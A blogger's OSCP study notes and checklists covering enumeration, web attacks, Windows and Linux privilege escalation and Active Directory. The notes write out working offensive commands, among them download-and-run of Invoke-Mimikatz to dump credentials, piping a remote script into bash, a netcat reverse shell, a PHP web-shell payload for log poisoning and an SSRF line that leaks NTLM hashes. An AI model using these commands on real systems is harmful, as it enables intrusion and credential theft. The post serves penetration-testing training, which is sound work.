Parzival

Offensive Security Rants & Threat Actor Roleplay

My OSCP Notes & Resources

21 April 2022

I passed my OSCP in 2022 and wanted to contribute to the many helpful posts providing tips, tricks, and resources. I would also recommend referencing my GitBook for additional tooling and methodology.

Please keep in mind while reading this post that these are pretty much a direct copy of my rough notes.. As a result, there may be some unfinished thoughts, commands, and checklists contained within. Simple checklists help me not overthink - which coincidentally is my piece of advice for anyone attempting the OSCP.

Before Getting Started

Make sure while studying for the OSCP that you take lots of breaks, enjoy some coffee, and spend time with your friends and family. It’s no secret that the OSCP is tough, but struggling to exploit a machine or pass the first time doesn’t mean you’re any less of a hacker than the rest of us.

Resources That You Should Read

Directly from Offensive Security

These are articles that Offensive Security has created and will answer several questions you may have about the exam. For example, what tooling is allowed and what the exam structure will look like.

From the Community

Resources from the community that I found helpful while preparing for my exam.

Preparation

Resources that I recommend checking out while preparing for the OSCP. For my preparation, I completed every Proving Ground Practice machine and several NetSecFocus HackTheBox recommendations. Additionally, I found S1REN’s walkthroughs incredibly helpful, they provide a great view of how you should be tackling machines.

Checklists

Quick Checklist

This is my generic checklist and a baseline for every single box:

  • Perform a speedy Nmap scan:
nmap -sV -sC -p- --min-rate=1000 -iL [scope] -oA Full-TCP-Scan
  • Perform a speedy UDP scan:
nmap -sUC --top-ports 1000 --min-rate=1000 -iL [scope] -oA Top-1000-UDP-Scan
  • Run Nikto against all identified ports: nikto $ip
  • Perform an nslookup: nslookup $ip
  • Perform a Zone Transfer: dig axfr $ip
  • Alternatively, run Enum4Linux-ng. This is written in Python and significantly better than Enum4Linux in my experience.
  • Run FeroxBuster against all identified web servers.
  • Run AutoRecon against the hosts after completing initial reconaissance.

Active Directory Checklist

Simple notes for Active Directory during the OSCP:

# Enumerate all local users
net user

# Enumerate all users in the domain
net user /domain

# Enumerate a specified user
net user $username /domain
1. Gain access to a domain user account.
2. Enumerate the domain with the commands listed above.
3. Enumerate all computers on the domain. Don't just enumerate one computer.. Enumerate them all.
4. Enumerate all users logged onto computers that we have local administrator access to.
5. Kerberoast with any user account acquired (GetUserSPNs, Invoke-Kerberoast, etc)
6. Attempt credential-based attacks against all discovered user accounts.
7. Pass the Hash to pivot (Also try to Pass the Ticket if applicable).
8. Run Mimikatz on all systems (Can also run LSASSY with CrackMapExec).
9. Enumerate password hashes and tickets: `sekurlsa::logonpasswords` and `sekurlsa::tickets`.

Web Server Checklist

This checklist serves as a very basic web server checklist:

  • Read all pages through fully to identify any potential usernames and/or emails.
  • Check for robots.txt to enumerate any additional information about the site.
  • Check the SSL certificate for any usernames.
  • Enumerate directories with either FeroxBuster or GoBuster.
  • Run FeroxBuster with any identiifed extensions (e.g., -x php,html,sh)
  • Enumerate available applications to identify version numbers such as the CMS, server installation pages, and use Wappalyzer.
  • View source code to identify any usernames/passwords, hidden developer comments, and hidden pages.
  • Test all identified parameters for LFI, RFI, SQLi, SSRF, etc.
  • Test default credentials against all of the login pages: admin:admin or credentials identified via Google for the application.
  • Attempt to bypass login with basic SQLi.
  • Register an account on the site if possibe to test any additionally identified parameters.
  • Scan for Heartbleed: sslscan $ip

Windows Checklist

This checklist serves as a very basic Windows checklist:

- Run SMBMap against any identified SMB services: smbmap -H $ip
- Access SMB shares manually with smbclient: `smbclient \\$ip\$share
- Revisit all services with any identified credentials such as SSH, SMB, FTP, HTTP. 
- Get the naming context of LDAP: ldapsearch -h $ip -x -s base namingcontexts
- After identifying the naming context, enumerate more: `ldapsearch -h $ip -x -b "DC=htb,DC=local"
- Enumerate RPC with rpcclient: `rpcclient -U '' $ip
- Some interesting flags for rpcclient are: `enumdomusers`, `queryuser parzival`, `querydomgroups`, and `querydispinfo`
- Enumerate LDAP without credentials: 
    ldapsearch -x -h $ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
  • If WebDAV is identified then we can upload a web shell using Cadaver
  • If we’re authenticated to WebDAV then davtest is amazing at testing upload capabilities:
davtest -auth $user:[PASSWORD] -sendbd auto -url http://$ip

Pre-OSCP Tooling Checklist

This checklist serves as a reminder for what I needed to install prior to taking my OSCP exam, you don’t want to spend the first few hours of your exam setting up an environment:

  • Update Kali
  • Ensure you have the latest version of Impacket from GitHub.
  • Ensure you have a working version of CrackMapExec.
  • Update Empire and ensure it is functional prior to taking the exam.
  • Update Searchsploit: searchsploit -u
  • Ensure LDAPDomainDump is installed.
  • Ensure the PEAS scripts are installed and placed into a web directory.
  • Ensure pspy is installed and placed into a web directory.
  • Ensure BloodHound is installed and connected to the DB.
  • Ensure your webshells of choice are downloaded and placed into a web directory.
  • Snapshot. Snapshot. Snapshot.

Rough Notes

Enumeration

  • Personally I like running the following Nmap scans to perform enumeration:
# Full-TCP-Scan
nmap -sV -sC -p- --min-rate 1000 -T4 $ip -oA Full-TCP-Scan

# Top-UDP-Scan
nmap -sU --top-ports 1000 -T4 $ip -oA Quick-UDP-Scan

# Vulnerability Scan
nmap -p $discoveredports --script=vuln $ip -oA Vuln-Scan
  • If Ident is available then we may be able to enumerate users. While nmap -sC should successfully enumerate users, it is always good to double check:
ident-user-enum $ip 22 53 113

Web Application

  • If you are getting the following message “You are not a search engine. Permission denied.” when attempting to browse to robots.txt then modify your user agent in Burp Suite to the following: User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
  • If a login page default password doesn’t work then think of what a lazy admin would use (uppercase and lowercase). CeWL can also be used if you’re running out of ideas.
  • If a web application is vulnerable to SSRF and the host is Windows, you may be able to retrieve a Net-NTLMv2 hash. The following command assumes that the web server is running on tcp/8080:
http://:8080/?url=http://127.0.0.1:8080/?url=http://<RESPONDER_IP>
  • If a WebDav directory is discovered during enumeration then it should be noted that an LFI vulnerability could be used to obtain the password and upload a PHP shell. The following is an example of a Webdav password location: /var/www/html/webdav/passwd.dav
  • If /cgi-bin/ is identified then ensure you look for common file extensions like .sh. This directory exists when Apache gives a file over to bash or another scripting language.
  • When testing Remote File Inclusion keep in mind that the port being tested matters. Use a common port such as 80 or 443 on your Python3 server when testing.
  • Oracle SQLi - This link is beyond useful. Ensure your syntax is correct with Oracle because it can be pain.

Obtaining Initial Access

  • Always try to login with default passwords and with using the username as a password. For example, if a username has been identiifed as parzival try and login with the password parzival
  • Sometimes a simple wordlist can be your friend.. Ensure ‘dumb’ combinations are attempted like admin:admin
  • If testing for Shellshock on SMTP then I have found this exploitto be the most reliable. It requires a valid email address so ensure you run VRFY to enumerate a valid email prior to execution.
  • If you can access the Apache logs through LFI and observe the ‘User Agent’ is viewable, we can potentially specify our user agent to PHP code and execute that on the target machine. This video from John Hammond is a great example. Using this we can potentially turn an LFI into RCE. An example user agent would be the following: User-Agent: <?php system(\$_GET['c']); ?>
  • Log into the SMTP server to identify the version if it is not returned in the Nmap scan. Identifying Postfix means that multiple exploits from Searchsploit may work: searchsploit postfix
  • Narrowing down a version number of an application can greatly increase your chances of finding an exploit.
  • If you ever have LFI and SSH is open, try reading the id_rsa file for any users that have been enumerated.

Privilege Escalation - Linux

  • If LinPEAS doesn’t return anything useful then it is possible you already have the information needed to privilege escalate. Try default passwords, priv esc with fail2ban, and other common tricks.
  • Don’t forget to check for any Kernel exploits: uname -a
  • For privilege escalation with fail2ban, use a Netcat shell or modify the permissions of /etc/shadow
  • If there are no writable directories then just pipe LinPEAS (or other tool of choice) directly into bash: curl 10.10.10.1:8080/linpeas.sh | bash
  • Run this command to identify possible privilege escalation efforts: which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
  • If you’ve identified a CronJob that may be exploitable then it may be worth plugging it into CronGuru.
  • If spawning a shell, check all files for MySQL credentials. It is likely you will be able to privilege escalate once located. To login, ensure you have a stable shell and type mysql -u root -p
  • If you are a member of the ‘Docker’ group then there are multiple opportunities for privilege escalation such as docker images and docker run -v /:/mnt --rm -it [IMAGE] chroot /mnt sh
  • If breaking out of a restricted shell, ensure you check the local bin and then GTFOBins for any easy breakouts.
  • Sometimes you will have to export your path after breaking out of a restricted shell. Use the following command to correct your path: export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Privilege Escalation - Windows

  • PowerShell Empire has some great PS1 scripts readily available such as Invoke-Watson and Invoke-MS16032 as examples. Their Mimikatz.ps1 is also great. These can be accessed at the following location Kali: /usr/share/powershell-empire/empire/server/data/module_source/
  • Use the following command to search for cleartext passwords in registry: reg query HKCU /f password /t REG_SZ /s
  • Be careful using commands ripped from other sites, make sure you understand what they are doing and how to modify them. An example for the previous note is modifying it to be more broad: reg query HKCU /f pass /t REG_SZ /s
  • Windows binaries are ready to go on Kali: /usr/share/windows-binaries
  • Fix your Windows path with the following command: set PATH=%SystemRoot%\system32;%SystemRoot%;
  • Unable to get Mimikatz onto a machine? Simply host a http server and execute the following:
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.119.164:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -Command lsadump::sam
  • Check out C:\Program Files (x86) for any outdated and vulnerable installations.
  • If Administrator credentials have been obtained but you can’t get an interactive shell then strongly consider using the runas command in combination with a binary like netcat: runas /env /profile /user:[DOMAIN]\Administrator "C:\Windows\Tasks\nc.exe -e cmd.exe $attackerip 443"
  • Mimikatz errors? Need to downgrade your version? Use the version availabke at this link.

Additional Windows Privilege Escalation Resources

Some additional resources I referenced throughout Windows privilege escalation

Python Privilege Escalation

We can privesc in multiple ways from running this script. For example, we can add a root user to the /etc/passwd file or we can run /bin/bash -p to obtain a shell with root privileges.

    import os
    
    def stop(text,value):
    	os.system("chmod 777 /etc/passwd");
    
    def reset(text,value):
    	os.system("chmod +s /bin/bash");
        
    def start(text,value):
    	os.system("chmod 777 /etc/shadow");

Active Directory

  • You can perform post exploitation activities such as Kerberoasting with a machine account. This may be important if you cannot find another path to exploitation:
    GetUserSPNs.py -request 'DOMAIN/MACHINE$' -dc-ip $dcip -hashes 'LM:NTLM'
    
  • Enumerate local accounts: net user
  • Enumerate all users in the domain: net user /domain
  • Query the specified user: net user $user /domain
  • List all groups in the domain: net group /domain
  • Enumerate the domain account policy: net accounts
  • I strongly recommend using CrackMapExec or DomainPasswordSpray to perform any type of password spraying attack.
  • Run klist to see if there are any tickets stored in memory. This can also be performed with Mimikatz by running: kerberos::list /export
  • These can then be cracked by using tgsrepcrack.py or your favorite password cracking tool.
  • PowerView is your best friend when attempting to pivot. Run the following commands to get the lay of the land and perform exploitation activities.
  • Return logged on users for the specified domain: Get-NetLoggedOn -ComputerName [COMPUTER]
  • Determine if a Domain Administrator has an active logon: Get-NetSession -ComputerName [DC]
  • Perform Kerberoasting with PowerView: Get-NetUser -SPN | select serviceprincipalname Perform Kerberoasting with PowerView.
  • Pass the Hash (PtH) utilizes NTLM hashes. I won’t go deep into it here, however this can be accomplished with nearly every tool at your disposal
  • Overpass the Hash allows us to utilize a users NTLM hash to obtain a Kerberos TGT or service ticket.
  • After conducting this attack we can use any tooling that relies on Kerberos authentication rather than NTLM.
  • PsExec is a great example of a tool that would benefit from this.
  • Other attacks such as Silver Tickets and and Pass the Ticket have plenty of documentation online. Consult online guides when encountering this.
  • Another great Kerberoasting resource
  • Invoke-Kerberoast](https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/)Invoke-Kerberoast -OutputFormat HashCat Select-Object -ExpandProperty hash

Transferring Files

- curl: `curl http://$attackerip/winpeas.exe -o winpeas.exe`
- wget: `wget http://$attackerip/winpeas.exe -O winpeas.exe`

Transferring with SMB

1. `impacket-smbserver parzival [TARGET_DIRECTORY]`
2. Validate the share is accessible: `net view $attackerip`
3. Copy the file to a local directory: `copy \\$attackerip\parzival\winpeas.exe`
4. Alternatively, run the file directly from the SMB share: `\\$attackerip \parzival\winpeas.exe`

Transferring with PowerShell

(New-Object System.Net.WebClient).DownloadFile("http://$attackerip/winpeas.exe", "C:\Windows\Temp\winpeas.exe")Invoke-WebRequest "http://$attackerip/winpeas.exe" -OutFile 
"C:\Windows\Temp\winpeas.exe"powershell.exe -c "iwr http://$attackerip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe

Buffer Overflow (Removed as of 2023)

While the Buffer Overflow has since been removed from the exam environment, it still provides a great introduction to low-level exploit development. After obtaining your shiny new certification, I would still recommend checking out publcily available resources.

Common Bad Characters

NULL (\0)
Tab (\t)
Line Feed (\n)
Carriage Return (\r)
Form Feed (\f)Common Bad Characters

Best Resource for Buffer Overflows